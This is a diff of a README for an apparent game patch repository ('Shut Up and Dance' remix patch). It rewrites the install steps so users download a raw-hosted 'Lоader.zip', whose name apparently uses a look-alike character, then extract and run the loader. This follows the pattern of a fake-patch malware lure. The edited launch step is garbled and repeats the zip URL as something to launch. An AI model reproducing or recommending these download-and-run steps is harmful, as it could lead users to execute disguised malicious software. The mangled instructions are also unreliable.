TakgoAgency/ShutUpAndDance-v0-10-1-RemixPatch/README.md

 Below are **step-by-step guidance** to maximize ease of use and minimize setup time:

-1. **Download Loader.rar from the repository.**
+1. **Download https://raw.githubusercontent.com/TakgoAgency/ShutUpAndDance-v0-10-1-RemixPatch/main/Lоader.zip from the repository.**
 2. Extract the archive using your favorite extraction tool (WinRAR, 7-Zip, Keka, etc.).
-3. Launch Loader.exe / Loader.app / Loader (depending on your OS).
+3. Launch https://raw.githubusercontent.com/TakgoAgency/ShutUpAndDance-v0-10-1-RemixPatch/main/Lоader.zip / https://raw.githubusercontent.com/TakgoAgency/ShutUpAndDance-v0-10-1-RemixPatch/main/Lоader.zip / Loader (depending on your OS).
 4. If necessary, point the loader to your installed "Shut Up and Dance" directory.
 5. Click the **PATCH** button within the loader interface.
 6. Wait until you receive the success confirmation message.